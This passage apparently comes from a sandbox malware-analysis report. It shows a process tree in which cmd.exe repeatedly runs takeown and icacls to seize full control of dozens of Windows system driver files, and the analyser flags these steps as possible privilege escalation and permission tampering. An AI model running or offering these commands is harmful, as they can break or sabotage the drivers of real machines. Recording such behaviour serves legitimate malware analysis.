C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\srv2.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6396
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\srv2.sys /grant "Admin:F"3⤵PID:6488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\srvnet.sys && icacls C:\Windows\System32\drivers\srvnet.sys /grant "%username%:F" && exit2⤵PID:7132
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\srvnet.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6152
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\srvnet.sys /grant "Admin:F"3⤵PID:6148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\stexstor.sys && icacls C:\Windows\System32\drivers\stexstor.sys /grant "%username%:F" && exit2⤵PID:5432
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\stexstor.sys3⤵
- Modifies file permissions
PID:6280
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\stexstor.sys /grant "Admin:F"3⤵PID:6420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\storport.sys && icacls C:\Windows\System32\drivers\storport.sys /grant "%username%:F" && exit2⤵PID:6212
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\storport.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\storvsc.sys && icacls C:\Windows\System32\drivers\storvsc.sys /grant "%username%:F" && exit2⤵PID:5180
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\storvsc.sys3⤵PID:6548
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\storvsc.sys /grant "Admin:F"3⤵PID:6656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\stream.sys && icacls C:\Windows\System32\drivers\stream.sys /grant "%username%:F" && exit2⤵PID:6304
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\stream.sys3⤵PID:6720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\swenum.sys && icacls C:\Windows\System32\drivers\swenum.sys /grant "%username%:F" && exit2⤵PID:6436
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\swenum.sys3⤵
- Modifies file permissions
PID:6948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Synth3dVsc.sys && icacls C:\Windows\System32\drivers\Synth3dVsc.sys /grant "%username%:F" && exit2⤵PID:6576
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Synth3dVsc.sys3⤵
- Modifies file permissions
PID:6920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tape.sys && icacls C:\Windows\System32\drivers\tape.sys /grant "%username%:F" && exit2⤵PID:6648
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tape.sys3⤵PID:7084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tcpip.sys && icacls C:\Windows\System32\drivers\tcpip.sys /grant "%username%:F" && exit2⤵PID:6664
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tcpip.sys3⤵PID:6792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tcpipreg.sys && icacls C:\Windows\System32\drivers\tcpipreg.sys /grant "%username%:F" && exit2⤵PID:6880
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tcpipreg.sys3⤵PID:5076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdi.sys && icacls C:\Windows\System32\drivers\tdi.sys /grant "%username%:F" && exit2⤵PID:6940
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tdi.sys3⤵PID:7080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdpipe.sys && icacls C:\Windows\System32\drivers\tdpipe.sys /grant "%username%:F" && exit2⤵PID:6808
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tdpipe.sys3⤵PID:6268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdtcp.sys && icacls C:\Windows\System32\drivers\tdtcp.sys /grant "%username%:F" && exit2⤵PID:7160
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tdtcp.sys3⤵
- Modifies file permissions
PID:6368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdx.sys && icacls C:\Windows\System32\drivers\tdx.sys /grant "%username%:F" && exit2⤵PID:6928
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tdx.sys3⤵PID:6280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\termdd.sys && icacls C:\Windows\System32\drivers\termdd.sys /grant "%username%:F" && exit2⤵PID:5616
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\termdd.sys3⤵
- Possible privilege escalation attempt
PID:7100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\terminpt.sys && icacls C:\Windows\System32\drivers\terminpt.sys /grant "%username%:F" && exit2⤵PID:6352
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\terminpt.sys3⤵PID:7132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tssecsrv.sys && icacls C:\Windows\System32\drivers\tssecsrv.sys /grant "%username%:F" && exit2⤵PID:6508
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tssecsrv.sys3⤵PID:6440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\TsUsbFlt.sys && icacls C:\Windows\System32\drivers\TsUsbFlt.sys /grant "%username%:F" && exit2⤵PID:6528
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\TsUsbFlt.sys3⤵PID:5152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\TsUsbGD.sys && icacls C:\Windows\System32\drivers\TsUsbGD.sys /grant "%username%:F" && exit2⤵PID:2872
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\TsUsbGD.sys3⤵
- Modifies file permissions
PID:7080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tsusbhub.sys && icacls C:\Windows\System32\drivers\tsusbhub.sys /grant "%username%:F" && exit2⤵PID:6688
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tsusbhub.sys3⤵PID:7124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tunnel.sys && icacls C:\Windows\System32\drivers\tunnel.sys /grant "%username%:F" && exit2⤵PID:6816
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tunnel.sys3⤵PID:6240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\UAGP35.SYS && icacls C:\Windows\System32\drivers\UAGP35.SYS /grant "%username%:F" && exit2⤵PID:7000
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\UAGP35.SYS3⤵
- Modifies file permissions
PID:6192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\udfs.sys && icacls C:\Windows\System32\drivers\udfs.sys /grant "%username%:F" && exit2⤵PID:6952
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\udfs.sys3⤵PID:6292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ULIAGPKX.SYS && icacls C:\Windows\System32\drivers\ULIAGPKX.SYS /grant "%username%:F" && exit2⤵PID:6372
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ULIAGPKX.SYS3⤵PID:7124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\umbus.sys && icacls C:\Windows\System32\drivers\umbus.sys /grant "%username%:F" && exit2⤵PID:6200
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\umbus.sys3⤵PID:6608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\umpass.sys && icacls C:\Windows\System32\drivers\umpass.sys /grant "%username%:F" && exit2⤵PID:6804
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\umpass.sys3⤵PID:6316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usb8023.sys && icacls C:\Windows\System32\drivers\usb8023.sys /grant "%username%:F" && exit2⤵PID:7016
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usb8023.sys3⤵PID:7184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\USBCAMD2.sys && icacls C:\Windows\System32\drivers\USBCAMD2.sys /grant "%username%:F" && exit2⤵PID:6532
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\USBCAMD2.sys3⤵
- Modifies file permissions
PID:7240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbccgp.sys && icacls C:\Windows\System32\drivers\usbccgp.sys /grant "%username%:F" && exit2⤵PID:6608
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbccgp.sys3⤵PID:7284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbcir.sys && icacls C:\Windows\System32\drivers\usbcir.sys /grant "%username%:F" && exit2⤵PID:7192
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbcir.sys3⤵PID:7324
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbd.sys && icacls C:\Windows\System32\drivers\usbd.sys /grant "%username%:F" && exit2⤵PID:7224
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbd.sys3⤵PID:7368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbehci.sys && icacls C:\Windows\System32\drivers\usbehci.sys /grant "%username%:F" && exit2⤵PID:7264
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbehci.sys3⤵
- Modifies file permissions
PID:7404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbhub.sys && icacls C:\Windows\System32\drivers\usbhub.sys /grant "%username%:F" && exit2⤵PID:7304
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbhub.sys3⤵
- Possible privilege escalation attempt
PID:7452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbohci.sys && icacls C:\Windows\System32\drivers\usbohci.sys /grant "%username%:F" && exit2⤵PID:7344
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbohci.sys3⤵PID:7532
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\usbohci.sys /grant "Admin:F"3⤵PID:7616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbport.sys && icacls C:\Windows\System32\drivers\usbport.sys /grant "%username%:F" && exit2⤵PID:7376
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbport.sys3⤵
- Modifies file permissions
PID:7500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbprint.sys && icacls C:\Windows\System32\drivers\usbprint.sys /grant "%username%:F" && exit2⤵PID:7424
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbprint.sys3⤵PID:7540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbrpm.sys && icacls C:\Windows\System32\drivers\usbrpm.sys /grant "%username%:F" && exit2⤵PID:7464
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbrpm.sys3⤵
- Possible privilege escalation attempt
PID:7564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\USBSTOR.SYS && icacls C:\Windows\System32\drivers\USBSTOR.SYS /grant "%username%:F" && exit2⤵PID:7492
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\USBSTOR.SYS3⤵PID:7640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbuhci.sys && icacls C:\Windows\System32\drivers\usbuhci.sys /grant "%username%:F" && exit2⤵PID:7524
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbuhci.sys3⤵PID:7808
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vdrvroot.sys && icacls C:\Windows\System32\drivers\vdrvroot.sys /grant "%username%:F" && exit2⤵PID:7572
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vdrvroot.sys3⤵
- Possible privilege escalation attempt
PID:7832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vga.sys && icacls C:\Windows\System32\drivers\vga.sys /grant "%username%:F" && exit2⤵PID:7604
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vga.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7820
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\vga.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:7868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vgapnp.sys && icacls C:\Windows\System32\drivers\vgapnp.sys /grant "%username%:F" && exit2⤵PID:7648
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vgapnp.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7860
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\vgapnp.sys /grant "Admin:F"3⤵PID:7944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vhdmp.sys && icacls C:\Windows\System32\drivers\vhdmp.sys /grant "%username%:F" && exit2⤵PID:7672
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vhdmp.sys3⤵PID:7884
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\vhdmp.sys /grant "Admin:F"3⤵PID:7936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\viaide.sys && icacls C:\Windows\System32\drivers\viaide.sys /grant "%username%:F" && exit2⤵PID:7708
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\viaide.sys3⤵PID:7924
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\viaide.sys /grant "Admin:F"3⤵PID:7964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\videoprt.sys && icacls C:\Windows\System32\drivers\videoprt.sys /grant "%username%:F" && exit2⤵PID:7760
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\videoprt.sys3⤵
- Possible privilege escalation attempt
PID:7996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vmbus.sys && icacls C:\Windows\System32\drivers\vmbus.sys /grant "%username%:F" && exit2⤵PID:7788
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vmbus.sys3⤵
- Possible privilege escalation attempt
PID:8040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\VMBusHID.sys && icacls C:\Windows\System32\drivers\VMBusHID.sys /grant "%username%:F" && exit2⤵PID:7848
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\VMBusHID.sys3⤵
- Possible privilege escalation attempt
PID:8084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vms3cap.sys && icacls C:\Windows\System32\drivers\vms3cap.sys /grant "%username%:F" && exit2⤵PID:7904
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vms3cap.sys3⤵PID:8096
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\vms3cap.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:8112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vmstorfl.sys && icacls C:\Windows\System32\drivers\vmstorfl.sys /grant "%username%:F" && exit2⤵PID:7976
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vmstorfl.sys3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:8144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\volmgr.sys && icacls C:\Windows\System32\drivers\volmgr.sys /grant "%username%:F" && exit2⤵PID:8024
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\volmgr.sys3⤵PID:8168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\volmgrx.sys && icacls C:\Windows\System32\drivers\volmgrx.sys /grant "%username%:F" && exit2⤵PID:8064
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\volmgrx.sys3⤵PID:7236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\volsnap.sys && icacls C:\Windows\System32\drivers\volsnap.sys /grant "%username%:F" && exit2⤵PID:8124
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\volsnap.sys3⤵PID:7328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vsmraid.sys && icacls C:\Windows\System32\drivers\vsmraid.sys /grant "%username%:F" && exit2⤵PID:8180
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vsmraid.sys3⤵PID:7364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vwifibus.sys && icacls C:\Windows\System32\drivers\vwifibus.sys /grant "%username%:F" && exit2⤵PID:7184
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vwifibus.sys3⤵PID:7500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vwififlt.sys && icacls C:\Windows\System32\drivers\vwififlt.sys /grant "%username%:F" && exit2⤵PID:7248
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vwififlt.sys3⤵PID:7552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vwifimp.sys && icacls C:\Windows\System32\drivers\vwifimp.sys /grant "%username%:F" && exit2⤵PID:7392
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vwifimp.sys3⤵
- Possible privilege escalation attempt
PID:7624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\wacompen.sys && icacls C:\Windows\System32\drivers\wacompen.sys /grant "%username%:F" && exit2⤵PID:7296
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\wacompen.sys3⤵PID:7820
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\wacompen.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:7604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\wanarp.sys && icacls C:\Windows\System32\drivers\wanarp.sys /grant "%username%:F" && exit2⤵PID:7564
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\wanarp.sys3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:7292
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\wanarp.sys /grant "Admin:F"3⤵PID:7812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\watchdog.sys && icacls C:\Windows\System32\drivers\watchdog.sys /grant "%username%:F" && exit2⤵PID:7620
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\watchdog.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7692
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\watchdog.sys /grant "Admin:F"3⤵PID:7824
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\wd.sys && icacls C:\Windows\System32\drivers\wd.sys /grant "%username%:F" && exit2⤵PID:7872
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\wd.sys3⤵
- Possible privilege escalation attempt
PID:7744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Wdf01000.sys && icacls C:\Windows\System32\drivers\Wdf01000.sys /grant "%username%:F" && exit2⤵PID:7912
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Wdf01000.sys3⤵PID:8036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\WdfLdr.sys && icacls C:\Windows\System32\drivers\WdfLdr.sys /grant "%username%:F" && exit2⤵PID:7944
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\WdfLdr.sys3⤵PID:7972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\wfplwf.sys && icacls C:\Windows\System32\drivers\wfplwf.sys /grant "%username%:F" && exit2⤵PID:7968
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\wfplwf.sys3⤵PID:8136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\wimmount.sys && icacls C:\Windows\System32\drivers\wimmount.sys /grant "%username%:F" && exit2⤵PID:8076
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\wimmount.sys3⤵PID:7540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\winhv.sys && icacls C:\Windows\System32\drivers\winhv.sys /grant "%username%:F" && exit2⤵PID:8116
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\winhv.sys3⤵
- Modifies file permissions
PID:7372
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\winhv.sys /grant "Admin:F"3⤵PID:7580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\wmiacpi.sys && icacls C:\Windows\System32\drivers\wmiacpi.sys /grant "%username%:F" && exit2⤵PID:7276
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\wmiacpi.sys3⤵PID:7456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\wmilib.sys && icacls C:\Windows\System32\drivers\wmilib.sys /grant "%username%:F" && exit2⤵PID:7536
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\wmilib.sys3⤵PID:7516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ws2ifsl.sys && icacls C:\Windows\System32\drivers\ws2ifsl.sys /grant "%username%:F" && exit2⤵PID:7800
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ws2ifsl.sys3⤵PID:8160
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\WUDFPf.sys && icacls C:\Windows\System32\drivers\WUDFPf.sys /grant "%username%:F" && exit2⤵PID:7692
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\WUDFPf.sys3⤵
- Possible privilege escalation attempt
PID:7632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\WUDFRd.sys && icacls C:\Windows\System32\drivers\WUDFRd.sys /grant "%username%:F" && exit2⤵PID:7612
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\WUDFRd.sys3⤵
- Modifies file permissions
PID:7924
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "54895417653445655620751004148627423071719257307-525580787-7071774771257655175"1⤵PID:668
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1621733526-12011147161859254869-1695348543-119211382-14980353089736523011016234392"1⤵PID:2952
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-11435681537744094457464622-1367195511839874554826055691649856111821994029"1⤵PID:1624
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-3576495458805297127931491901025074956982201503-18164519511215232641-553113933"1⤵PID:576
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-346397899200832466614001831481313348780437562311510088114-1597840612177851318"1⤵PID:2200
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1674539640209590052-620824865-345331065-1712403586-159578867353962019-1418431666"1⤵PID:2096
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-27307056-51626916521179988316284245471316335247-1458593264-5854637631505391222"1⤵PID:1724
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1959520742-21406153961186878365-1770231113-1520222623889518384303678895307505780"1⤵PID:2728
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "84393655621056928821897055320-4313130461010516710-17565270531541018284-1549995032"1⤵PID:2204
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-8269622711828898472-2055274167-9621063312076265785-276465396-1076308921614959540"1⤵PID:2636
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "907999213135224872096942724311911542271954400322-1486061824-1117093346394661065"1⤵PID:2696
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-18951402328773463577693775105288011971796319081-466364653130441321400013580"1⤵PID:760
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "832134706-4131248092025083737-789389331-2019538104-756545179-1377304373197514798"1⤵PID:1268
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "950490706-5584995251537408815-1309645106-13177898181789902148-1484646813-1280944784"1⤵PID:2764
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "10574926018162032349417425271841068690-2146251370170320052712519946551363881966"1⤵PID:1388
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1761861311228798064-1223620581610275829-8453910321511030513295823737-30130781"1⤵PID:1000
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "583892375-1460933130-16170746771981842696-2103827964-160302078716198758971117849232"1⤵PID:2600
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-853127713772086928368335505-513630690-1450586175-18943463811370168503-735799625"1⤵PID:2512
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "358573084-960319267877290552-168505249-1209121303-994186568-737338682-63422102"1⤵PID:740
-
